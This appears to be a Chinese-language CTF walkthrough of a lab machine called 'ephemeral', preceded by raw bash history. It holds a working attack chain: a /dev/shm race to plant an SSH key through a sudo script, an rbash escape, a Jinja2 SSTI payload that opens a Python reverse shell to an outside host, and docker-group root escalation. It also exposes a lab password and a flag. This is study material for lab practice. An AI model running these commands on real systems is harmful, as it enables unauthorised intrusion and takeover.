 1582  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/id_rsa.pub > /dev/null; done
 1583  clear
 1584  cd /dev/shm/
 1585  ls -al 
 1586  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/id_rsa.pub > /dev/null; done
 1587  clear
 1588  cd /dev/shm/
 1589  ls -al 
 1590  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/id_rsa.pub > /dev/null; done
 1591  clear
 1592  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/id_rsa.pub > /dev/null; done
 1593  while true; do cat /dev/shm/id_rsa.pub
 1594  while true; do cat /dev/shm/id_rsa.pub; done
 1595  while true; do cat /dev/shm/id_rsa.pub > output.txt; done
 1596  ls 
 1597  while true; do cat /dev/shm/id_rsa.pub > output.txt; done
 1598  ls -al 
 1599  cat output.txt 
 1600  while true; do cat /dev/shm/id_rsa.pub | tee output.txt; done
 1601  while true; do cat /dev/shm/id_rsa.pub > output.txt; done
 1602  ls 
 1603  while true; do cat /dev/shm/id_rsa.pub > output.txt; done
 1604  ls -al 
 1605  cat output.txt 
 1606  while true; do cat /dev/shm/id_rsa.pub | tee output.txt; done
 1607  ls -la 
 1608  while true; do cat /dev/shm/id_rsa.pub | tee /home/donald/output.txt; done
 1609  while true; do cat /dev/shm/id_rsa.pub | grep -i ssh; done
 1610  while true; do cat /dev/shm/id_rsa.pub | grep -v ssh; done
 1611  while true; do cat /dev/shm/id_rsa.pub | grep ssh; done
 1612  while true; do cat /dev/shm/id_rsa.pub | grep -i nossh; done
 1613  ls -la 
 1614  rm -r output.txt 
 1615  while true; do cat /dev/shm/id_rsa.pub | tee /dev/shm/id_rsa.pub > output.txt; done
 1616  while true; do cat /dev/shm/id_rsa.pub > output.txt; done
 1617  ls 
 1618  while true; do cat /dev/shm/id_rsa.pub > output.txt; done
 1619  ls -al 
 1620  cat output.txt 
 1621  while true; do cat /dev/shm/id_rsa.pub | tee output.txt; done
 1622  ls -la 
 1623  while true; do cat /dev/shm/id_rsa.pub | tee /home/donald/output.txt; done
 1624  while true; do cat /dev/shm/id_rsa.pub | grep -i ssh; done
 1625  while true; do cat /dev/shm/id_rsa.pub | grep -v ssh; done
 1626  while true; do cat /dev/shm/id_rsa.pub | grep ssh; done
 1627  while true; do cat /dev/shm/id_rsa.pub | grep -i nossh; done
 1628  ls -la 
 1629  rm -r output.txt 
 1630  while true; do cat /dev/shm/id_rsa.pub | tee /dev/shm/id_rsa.pub > output.txt; done
 1631  ls -la 
 1632  while true; do tee /dev/shm/id_rsa.pub > output.txt; done
 1633  while true; do tee /dev/shm/id_rsa.pub > /tmp/output.txt; done
 1634  while true; do cat /dev/shm/id_rsa.pub; done
 1635  cd
 1636  exit
 1637  clear
 1638  cd /
 1639  cd /dev/shm/
 1640  ls -la 
 1641  ls -al 
 1642  ls f-la 
 1643  ls -la 
 1644  echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" > /dev/shm/id_rsa.pub
 1645  clear
 1646  ls -]al 
 1647  ls -la 
 1648  ls -al 
 1649  echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" > /dev/shm/id_rsa.pub
 1650  clear
 1651  ls -la 
 1652  echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" > /dev/shm/id_rsa.pub
 1653  ls -la 
 1654  clear
 1655  ls -al 
 1656  rm -r id_rsa.pub 
 1657  ls -al 
 1658  clear
 1659  echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" > /dev/shm/id_rsa.pub
 1660  clear
 1661  ls -la 
 1662  clear
 1663  ls -la 
 1664  rm -r id_rsa.pub 
 1665  clear
 1666  ls -la 
 1667  rm -r id_rsa.pub 
 1668  cd
 1669  ls -la 
 1670  cat output.txt 
 1671  ls -la 
 1672  su randy
 1673  exit
 1674  ssh donald@10.0.0.179
 1675  ssh donald@10.0.0.179 -t "bash --noprofile"
 1676  exit
 1677  while true; do tee /dev/shm/id_rsa.pub > /tmp/output.txt; done
 1678  while true; do cat /dev/shm/id_rsa.pub; done
 1679  while true; do cat /dev/shm/id_rsa.pub; grep -v cat; done
 1680  while true; do cat /dev/shm/id_rsa.pub; grep -i ssh; done
 1681  while true; do cat /dev/shm/id_rsa.pub; sleep 9.0 done
 1682  while true; do cat /dev/shm/id_rsa.pub; sleep 9.0; done
 1683  while true; do cat /dev/shm/id_rsa.pub; done
 1684  while true; do cat /dev/shm/id_rsa.pub; done > output.txt
 1685  ls -la 
 1686  cat output.txt 
 1687  clear
 1688  cat output.txt 
 1689  while true; do cat /dev/shm/id_rsa.pub; done > output.txt
 1690  ls -la 
 1691  cat output.txt 
 1692  rm -r 
 1693  rm -r output.txt 
 1694  clear
 1695  cat output.txt 
 1696  ls -la 
 1697  while true; do cat /dev/shm/id_rsa.pub; done > output.txt
 1698  ls -la
 1699  cat output.txt 
 1700  clear
 1701  ls -la 
 1702  clear
 1703  ls -la 
 1704  pwd 
 1705  sudo -l 
 1706  nano mypass.txt
 1707  clear
 1708  ls al 
 1709  ls -la 
 1710  cat mypass.txt 
 1711  clear
 1712  ls -la 
 1713  nano mypass.txt 
 1714  clear
 1715  si kevin
 1716  su kevin
 1717  id 
 1718  su kevin
 1719  exit
 1720  sudo -l
 1721  ssh donald@10.0.0.179 -t "bash --noprofile"
 1722  s -la 
 1723  clear
 1724  ls -la 
 1725  ssh donald@10.0.0.179 -t "bash --noprofile"
 1726  s -la 
 1727  ssh donald@10.0.0.179 -t "bash --noprofile"
 1728  lear
 1729  ssh donald@10.0.0.179 -t "bash --noprofile"
 1730  s -al 
 1731  ssh donald@10.0.0.179 -t "bash --noprofile"
 1732  exit
 1733  clear
 1734  ls -la 
 1735  rm -r .ssh/
 1736  clear
 1737  ls -al 
 1738  touch mypass.txt
 1739  clear
 1740  ls -la 
 1741  clear
 1742  ls -la 
 1743  cd Desktop/
 1744  ls -la 
 1745  clear
 1746  ls -la 
 1747  ./screen -v 
 1748  wget https://www.exploit-db.com/raw/41154 -O exploit.c
 1749  ls -la 
 1750  gcc exploit.c -o exploit
 1751  ls -la 
 1752  clear
 1753  ls -la 
 1754  rm -r exploit.c 
 1755  clear
 1756  ls -la 
 1757  nano exploit.c
 1758  ls -al 
 1759  gcc exploit.c -o exploit
 1760  ls -la 
 1761  rm -r exploit.c 
 1762  clear
 1763  nano exploit.sh
 1764  chmod +x exploit.sh 
 1765  ./exploit.sh 
 1766  ls -la 
 1767  ./exploit.sh 
 1768  clear
 1769  ls -la 
 1770  screen -v 
 1771  ./exploit.sh 
 1772  ls -la 
 1773  which screen
 1774  ls -la 
 1775  ./exploit.sh 
 1776  cd
 1777  ls -la 
 1778  cd Desktop/
 1779  ls -la 
 1780  ./exploit.sh 
 1781  cd /tmp/
 1782  ls -la 
 1783  rm -r rootshell 
 1784  clear
 1785  ls -la 
 1786  cd
 1787  cd Desktop/
 1788  ls -la 
 1789  ./exploit.sh 
 1790  clear
 1791  cd
 1792  su jane
 1793  clear
 1794  ls -la 
 1795  cd Desktop/
 1796  ls -la 
 1797  ./nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"
 1798  ls -la 
 1799  cat nohup
 1800  clear
 1801  ls -la 
 1802  rm -r nohup
 1803  ls -la 
 1804  rm -r nohup.out 
 1805  clear
 1806  cd /tmp/
 1807  ls -la 
 1808  cd keys/
 1809  ls -la 
 1810  cd..
 1811  cd ..
 1812  ls -la 
 1813  cd keys/
 1814  ls -la 
 1815  cd ..
 1816  ls -la 
 1817  cd keys/
 1818  ls -la 
 1819  cat id_rsa.pub 
 1820  clear
 1821  sudo -l
 1822  cat /usr/local/bin/addKeys.sh
 1823  cd
 1824  ls -la 
 1825  cd /tmp/
 1826  clear
 1827  ls -al 
 1828  sudo -l 
 1829  sudo -u jane /usr/local/bin/addKeys.sh
 1830  cd keys/
 1831  ls -la 
 1832  sudo -u jane /usr/local/bin/addKeys.sh
 1833  ls 
 1834  ls -la 
 1835  sudo -l 
 1836  sudo -u jane /usr/local/bin/addKeys.sh
 1837  clear
 1838  sudo -u jane /usr/local/bin/addKeys.sh
 1839  su jane 
 1840  sudo -l 
 1841  sudo -u jane /usr/local/bin/addKeys.sh
 1842  cd ..
 1843  ls -la 
 1844  cd keys/
 1845  ls -la ~
 1846  sudo -u jane /usr/local/bin/addKeys.sh
 1847  ls -l /home/jane/
 1848  cd
 1849  cd /home/
 1850  cd jane/
 1851  ls -la 
 1852  sudo -u jane /usr/local/bin/addKeys.sh
 1853  ls -al 
 1854  cd .ssh/
 1855  ls -la 
 1856  cat id_rsa
 1857  cat id_rsa.pub 
 1858  clear
 1859  ls -la 
 1860  cd ..
 1861  clear
 1862  sudo -l 
 1863  sudo -u jane /usr/local/bin/addKeys.sh
 1864  clear
 1865  cat /usr/local/bin/addKeys.sh
 1866  cd /dev/s
 1867  cd /dev/shm/
 1868  ls -la 
 1869  cd keys/
 1870  ls -la 
 1871  clear
 1872  sudo -u jane /usr/local/bin/addKeys.sh
 1873  clear
 1874  sudo -l 
 1875  sudo -u jane /usr/local/bin/addKeys.sh
 1876  clear
 1877  ls -al 
 1878  sudo -u jane /usr/local/bin/addKeys.sh
 1879  clear
 1880  ls -la 
 1881  sudo -u jane /usr/local/bin/addKeys.sh
 1882  cd ..
 1883  ls -al 
 1884  ls -la 
 1885  rm -r id_rsa.pub 
 1886  ls -la 
 1887  rm -r id_rsa.pub 
 1888  ls -al 
 1889  ls -la 
 1890  cat id_rsa.pub 
 1891  clear
 1892  ls -al 
 1893  rm -r id_rsa.pub 
 1894  ls -la 
 1895  rm -r id_rsa.pub 
 1896  ls -la 
 1897  clear
 1898  ls -la 
 1899  rm -r id_rsa.pub 
 1900  clear
 1901  ls -al 
 1902  sudo -l 
 1903  sudo -u jane /usr/local/bin/addKeys.sh
 1904  clear
 1905  sudo -u jane /usr/local/bin/addKeys.sh
 1906  clear
 1907  sudo -u jane /usr/local/bin/addKeys.sh
 1908  ls -la 
 1909  clear
 1910  ls -la 
 1911  rm  -r id_rsa.pub 
 1912  clear
 1913  ls -al 
 1914  rm -r id_rsa.pub 
 1915  ls -la 
 1916  clear
 1917  sudo -u jane /usr/local/bin/addKeys.sh
 1918  clear
 1919  ls -al 
 1920  clear
 1921  sudo -l 
 1922  sudo -u jane /usr/local/bin/addKeys.sh
 1923  ls -la 
 1924  rm -r id_rsa.pub 
 1925  clear
 1926  ls 
 1927  ls -al 
 1928  rm -r id_rsa.pub 
 1929  ls -la 
 1930  sudo -u jane /usr/local/bin/addKeys.sh
 1931  clear
 1932  ls -la 
 1933  cd
 1934  clear
 1935  ls -la 
 1936  cat mypass.txt 
 1937  clear
 1938  ls -al 
 1939  cat mypass.txt 
 1940  clear
 1941  sudo -l
 1942  clear
 1943  ls -al 
 1944  rm -r mypass.txt 
 1945  su root
 1946  clear
 1947  su randy
 1948  cd ..
 1949  su randy
 1950  clear
 1951  ls -la 
 1952  cd jane/
 1953  ls -la 
 1954  cd kevin/
 1955  cd randy/
 1956  clear
 1957  ssh jane@10.0.0.179
 1958  exit
 1959  ssh donald@10.0.0.179 -t "bash --noprofile"
 1960  exit 
 1961  clear
 1962  ls -la 
 1963  which pkexec
 1964  cd
 1965  exit
 1966  sudo -l
 1967  clear
 1968  ls -la 
 1969  sudo -l
 1970  clear
 1971  ls -la 
 1972  ssh donald@10.0.0.179 
 1973  exit
 1974  clear
 1975  exit
 1976  clear
 1977  sudo -l 
 1978  su jane
 1979  su kevin
 1980  exit
 1981  ssh donald@10.0.0.179 
 1982  ssh donald@10.0.0.179 -t "bash --profile"
 1983  ssh donald@10.0.0.179 -t "bash --noprofile"
 1984  clear
 1985  exit
 1986  clear
 1987  ls -la 
 1988  cd ..
 1989  ls -al 
 1990  cd donald/
 1991  ls 
 1992  cat mypass.txt 
 1993  cat note.txt 
 1994  clear
 1995  exit
 1996  clea
 1997  rcd
 1998  ssh 10.0.0.179 
 1999  ssh 10.0.0.179 -t "bash --noprofile"
 2000  exit
 2001  whoami
 2002  cd ~
 2003  ls
 2004  cat mypass.txt 
 2005  cat note.txt 
 2006  cd commands/
 2007  ls
 2008  id
 2009  history

(remote) donald@ephemeral:/$ sudo -l
[sudo] password for donald: 
Matching Defaults entries for donald on ephemeral:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User donald may run the following commands on
        ephemeral:
    (jane) PASSWD: /usr/local/bin/addKeys.sh

    
(remote) donald@ephemeral:/$ cat /usr/local/bin/addKeys.sh
#!/bin/bash

/usr/bin/rm -rf /dev/shm/id_rsa.pub
/usr/bin/rm -rf /dev/shm/id_rsa

/usr/bin/ssh-keygen -q -t rsa -N '' -f /dev/shm/id_rsa

/bin/echo "Keys Added!"

/usr/bin/rm -rf /home/jane/.ssh/

/bin/echo "Directory Deleted!"

/usr/bin/mkdir /home/jane/.ssh/

/bin/echo ".ssh Directory Created!"

/usr/bin/cp /dev/shm/id_rsa.pub /home/jane/.ssh/authorized_keys

/bin/echo "Keys Copied."

/usr/bin/chmod 600 /home/jane/.ssh/authorized_keys

/bin/echo "Permissions Changed!"

/usr/bin/rm -rf /dev/shm/id_rsa
/usr/bin/rm -rf /dev/shm/id_rsa.pub 

/bin/echo "Keys Removed!"






(remote) donald@ephemeral:/$ ls -la /usr/local/bin/addKeys.sh
-rwxr-xr-x 1 root root 579 Mar 16  2022 /usr/local/bin/addKeys.sh                                         
(remote) donald@ephemeral:/$

#!/bin/bash
# 使用 /bin/bash 解释器执行（不是 rbash）

/usr/bin/rm -rf /dev/shm/id_rsa.pub
# 删除 /dev/shm 中旧的公钥文件
# ⚠️ /dev/shm 是 world-writable，任何用户都能提前放文件

/usr/bin/rm -rf /dev/shm/id_rsa
# 删除 /dev/shm 中旧的私钥文件
# ⚠️ 这里只是假设“文件一定是脚本自己生成的”，但实际上不可信

/usr/bin/ssh-keygen -q -t rsa -N '' -f /dev/shm/id_rsa
# 生成一对 RSA SSH key
#   私钥：/dev/shm/id_rsa
#   公钥：/dev/shm/id_rsa.pub
# -N ''  表示私钥无密码
# -q     静默模式
# ⚠️ 如果文件已存在，ssh-keygen 会询问是否覆盖（交互点 / 竞态点）

/bin/echo "Keys Added!"
# 输出提示信息（无安全意义）

/usr/bin/rm -rf /home/jane/.ssh/
# 删除 jane 原有的 .ssh 目录
# 这会清空她之前的所有 SSH key
# ⚠️ 这是一次“强制重置 SSH 登录方式”

/bin/echo "Directory Deleted!"
# 提示信息

/usr/bin/mkdir /home/jane/.ssh/
# 重新创建 jane 的 .ssh 目录
# 默认权限通常为 755（取决于 umask）

/bin/echo ".ssh Directory Created!"
# 提示信息

/usr/bin/cp /dev/shm/id_rsa.pub /home/jane/.ssh/authorized_keys
# 将 /dev/shm 中的公钥复制为 jane 的 authorized_keys
# 🔥 关键漏洞点：
#   - 完全信任 /dev/shm/id_rsa.pub
#   - 不校验文件来源、owner、inode
#   - 如果攻击者在此之前替换了该文件
#   - jane 就会信任攻击者的 SSH key

/bin/echo "Keys Copied."
# 提示信息

/usr/bin/chmod 600 /home/jane/.ssh/authorized_keys
# 设置 authorized_keys 权限为 600（SSH 要求）
# ⚠️ 权限是对的，但内容可能是攻击者控制的

/bin/echo "Permissions Changed!"
# 提示信息

/usr/bin/rm -rf /dev/shm/id_rsa
# 删除 /dev/shm 中的私钥
# ⚠️ 攻击者通常已提前复制，删除已无意义

/usr/bin/rm -rf /dev/shm/id_rsa.pub
# 删除 /dev/shm 中的公钥
# ⚠️ 只是“表面清理痕迹”

/bin/echo "Keys Removed!"
# 最终提示

这是一个“以 jane 身份重置 SSH 登录密钥”的脚本
目的：让执行者可以用新生成的 key 登录 jane

**但因为使用了 world-writable 的 **/dev/shm** 且无校验，
**被 donald 利用做了竞态注入。

**利用 **sudo -u jane /usr/local/bin/addKeys.sh**
**往 **jane** 的 **authorized_keys** 写入你控制的 SSH 公钥

✅ Step 1：生成你自己的 SSH key（一次即可）

在 donald 上：

cd /dev/shm
ssh-keygen -q -t rsa -N '' -f jane

确认存在：

ls -l /dev/shm/jane*

尝试时发现存在rbash

donald@ephemeral:~$ cd /dev/shm -rbash: cd: restricted 
donald@ephemeral:~$ ssh-keygen -q -t rsa -N '' -f jane -rbash: /usr/lib/command-not-found: restricted: cannot specify /' in command names 
donald@ephemeral:~$ ls -l /dev/shm/jane* -rbash: /usr/lib/command-not-found: restricted: cannot specify /' in command names 
donald@ephemeral:~$

突破限制

ssh donald@192.168.0.100 -t "bash --noprofile"

donald\nORMAniAntIcINacKLAi

✅ Step 2：启动竞争（不要停）

while true; do
  cp /dev/shm/jane /dev/shm/id_rsa
  cp /dev/shm/jane.pub /dev/shm/id_rsa.pub
  chmod 777 /dev/shm/id_rsa /dev/shm/id_rsa.pub
done

⚠️ 这个窗口不要关，保持运行

✅ Step 3：在另一个终端执行 sudo 脚本

sudo -u jane /usr/local/bin/addKeys.sh

当看到提示：

/dev/shm/id_rsa already exists.
Overwrite (y/n)?

👉 输入：

然后脚本会正常跑完：

Keys Added!
Directory Deleted!
.ssh Directory Created!
Keys Copied.
Permissions Changed!
Keys Removed!

✅ Step 4：立刻保存私钥（非常关键）

在 donald 上：

cp /dev/shm/jane ~/jane_id_rsa
chmod 600 ~/jane_id_rsa

（就算 /dev/shm 里的被删了，这份还能用）

✅ Step 5：SSH 登录 jane 🎉

本机登录

ssh -i ~/jane_id_rsa jane@localhost

donald@ephemeral:~$ ssh -i ~/jane_id_rsa jane@localhost
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:/k63fO51xfAWhhIRatrod8DX2c8EHuVYagl9FGfd6Q0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'localhost' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.17.0-051700rc7-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

17 updates can be applied immediately.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

New release '22.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Your Hardware Enablement Stack (HWE) is supported until April 2025.
jane@ephemeral:~$

提权-randy

jane@ephemeral:~$ sudo -l
Matching Defaults entries for jane on ephemeral:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jane may run the following commands on
        ephemeral:
    (randy) NOPASSWD: /usr/bin/python3
        /var/www/html/private_html/app.py

jane@ephemeral:~$ cat /var/www/html/private_html/app.py
from flask import Flask, request
from jinja2 import Environment

app = Flask(__name__)
Jinja2 = Environment()

@app.route("/page")
def page():

    name = request.values.get('name')


    output = Jinja2.from_string('Welcome ' + name + '!').render()


    return output

if __name__ == "__main__":
    app.run(host='0.0.0.0', port=5000)

SSTI外部模板注入：漏洞点

output = Jinja2.from_string('Welcome ' + name + '!').render()

问题有 3 个：

name 来自用户输入

被 直接拼接进模板

使用的是 Jinja2.from_string().render()

curl -G \
  --data-urlencode "name={{cycler.__init__.__globals__.os.system(\"python3 -c 'import socket,os,pty;s=socket.socket();s.connect((\\\"192.168.0.106\\\",4444));[os.dup2(s.fileno(),i) for i in (0,1,2)];pty.spawn(\\\"/bin/bash\\\")'\")}}" \
  http://192.168.0.100:5000/page

┌──(web)─(root㉿kali)-[/home/kali]
└─# pwncat-cs -lp 4444

(remote) randy@ephemeral:/home/jane$ whoami
randy

(remote) randy@ephemeral:/home/randy$ cat user.txt 
68fef287012c99bf6df47fd97484748f

提权root

(remote) randy@ephemeral:/home/randy$ id
uid=1002(randy) gid=1002(randy) groups=1002(randy),1003(docker)

可以看见randy是docker组的，又因为之前在ps进程中看到了docker正在运行

docker run -it -v /:/mnt alpine chroot /mnt /bin/bash

`docker run` 到底做了什么

1️⃣ `docker run`

意思是：

让 docker 守护进程（root） 帮你启动一个容器

你虽然是普通用户，但你指挥的是 root 在干活。

2️⃣ `-v /:/mnt` —— 真正的杀招

宿主机的 /   →   容器里的 /mnt

这一步的真实含义是：

把宿主机的整个根文件系统，原封不动，交给容器

此时：

/mnt/etc = 宿主机 /etc
/mnt/root = 宿主机 /root
/mnt/bin = 宿主机 /bin

⚠️ 这一步已经是完全文件系统接管了。

3️⃣ `alpine`

只是一个壳子，不重要
重要的不是 alpine，而是 **你挂进去的 ****/**

4️⃣ `chroot /mnt /bin/bash`

这是最核心的一句

chroot 是什么？

chroot = 改变“你眼中的根目录”

执行这句之后：

之前你看到的 `/`	现在你看到的 `/`
alpine 容器的 `/`	宿主机的 `/`

所以这句：

chroot /mnt /bin/bash

翻成人话就是：

“在宿主机的根目录里，用 bash 给我开一个 shell”

(remote) randy@ephemeral:/home/randy$ id
uid=1002(randy) gid=1002(randy) groups=1002(randy),1003(docker)
(remote) randy@ephemeral:/home/randy$ docker images
REPOSITORY   TAG       IMAGE ID       CREATED       SIZE
alpine       latest    c059bfaa849c   4 years ago   5.59MB
(remote) randy@ephemeral:/home/randy$ 
(remote) randy@ephemeral:/home/randy$ docker run -it --rm \
>   -v /:/mnt \
>   alpine chroot /mnt /bin/bash

groups: cannot find name for group ID 4
groups: cannot find name for group ID 11
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@8d424afcf40b:/# 
root@8d424afcf40b:/# ls
bin    home    lost+found    proc  srv       var
boot   lib     media         root  swapfile
cdrom  lib32   mnt           run   sys
dev    lib64   opt           sbin  tmp
